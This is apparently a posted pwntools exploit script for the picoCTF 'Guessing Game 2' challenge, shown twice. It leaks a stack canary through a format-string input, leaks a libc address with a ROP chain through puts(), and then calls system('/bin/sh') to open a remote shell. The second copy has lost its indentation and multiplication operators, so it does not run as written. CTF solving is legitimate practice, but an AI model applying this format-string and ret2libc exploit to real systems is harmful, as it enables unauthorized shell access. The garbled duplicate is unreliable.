captain-woof · January 22, 2021 10:43
diff --git a/picoctf-guessing-game-2-exploit.py b/picoctf-guessing-game-2-exploit.py
 #!/usr/bin/python3

 from pwn import *

 # Prologue
 context.log_level = 'error'
 elf = ELF('./vuln')
 context.log_level = 'info'
 host,port = "jupiter.challenges.picoctf.org",13610
 proc = remote(host,port)
 #proc = gdb.debug("./vuln",gdbscript="""
 #			continue
 #		""")
 guess = str(-31)

 # Start
 proc.recvlines(4)
 g = log.progress("Guessing")
 g.status(guess)
 proc.sendline(guess)
 resp = proc.recvline().decode().strip()
 proc.recvline()
 	
 if "Congrats" in resp:
 	g.success("Guessed correctly!")
 else:
 	g.failure("Wrong guess")
 	exit(0)

 # Leaking the stack cookie
 c = log.progress("Stack cookie")
 c.status("Leaking...")
 proc.recvuntil("Name? ")
 proc.sendline("%135$p")
 proc.recvuntil("Congrats: ")
 canary = int(proc.recvline().decode().strip(),16)
 proc.recvline()
 c.success(hex(canary))

 # Leaking address of puts()
 pu = log.progress("puts() address in libc")
 pu.status("Leaking...")
 puts_plt = elf.plt['puts']
 puts_got = elf.got['puts']
 proc.recvline()
 proc.sendline(str(guess))
 proc.recvuntil("Name? ")
 payload = b"A"*512 + p32(canary) + b"A"*12 + p32(puts_plt) + p32(elf.functions['win'].address) + p32(puts_got)
 proc.sendline(payload)
 proc.recvlines(2)
 puts_addr = u32(proc.recv(4))
 pu.success(hex(puts_addr))

 # Getting shell
 binsh_offset = 0x1147bf # Offsets from
 system_offset= -0x2a650 # puts()

 shell = log.progress("Popping shell")
 shell.status("Sending payload")
 binsh_addr = puts_addr + binsh_offset
 system_addr = puts_addr + system_offset
 proc.recvuntil("Name? ")
 payload = b"A"*512 + p32(canary) + b"A"*12 + p32(system_addr) + p32(elf.functions['win'].address) + p32(binsh_addr)
 proc.sendline(payload)
 shell.success("Sent payload")
 proc.recvlines(2)
 proc.interactive()
	#!/usr/bin/python3

	from pwn import *

	# Prologue
	context.log_level = 'error'
	elf = ELF('./vuln')
	context.log_level = 'info'
	host,port = "jupiter.challenges.picoctf.org",13610
	proc = remote(host,port)
	#proc = gdb.debug("./vuln",gdbscript="""
	# continue
	# """)
	guess = str(-31)

	# Start
	proc.recvlines(4)
	g = log.progress("Guessing")
	g.status(guess)
	proc.sendline(guess)
	resp = proc.recvline().decode().strip()
	proc.recvline()

	if "Congrats" in resp:
	g.success("Guessed correctly!")
	else:
	g.failure("Wrong guess")
	exit(0)

	# Leaking the stack cookie
	c = log.progress("Stack cookie")
	c.status("Leaking...")
	proc.recvuntil("Name? ")
	proc.sendline("%135$p")
	proc.recvuntil("Congrats: ")
	canary = int(proc.recvline().decode().strip(),16)
	proc.recvline()
	c.success(hex(canary))

	# Leaking address of puts()
	pu = log.progress("puts() address in libc")
	pu.status("Leaking...")
	puts_plt = elf.plt['puts']
	puts_got = elf.got['puts']
	proc.recvline()
	proc.sendline(str(guess))
	proc.recvuntil("Name? ")
	payload = b"A"512 + p32(canary) + b"A"12 + p32(puts_plt) + p32(elf.functions['win'].address) + p32(puts_got)
	proc.sendline(payload)
	proc.recvlines(2)
	puts_addr = u32(proc.recv(4))
	pu.success(hex(puts_addr))

	# Getting shell
	binsh_offset = 0x1147bf # Offsets from
	system_offset= -0x2a650 # puts()

	shell = log.progress("Popping shell")
	shell.status("Sending payload")
	binsh_addr = puts_addr + binsh_offset
	system_addr = puts_addr + system_offset
	proc.recvuntil("Name? ")
	payload = b"A"512 + p32(canary) + b"A"12 + p32(system_addr) + p32(elf.functions['win'].address) + p32(binsh_addr)
	proc.sendline(payload)
	shell.success("Sent payload")
	proc.recvlines(2)
	proc.interactive()
No results found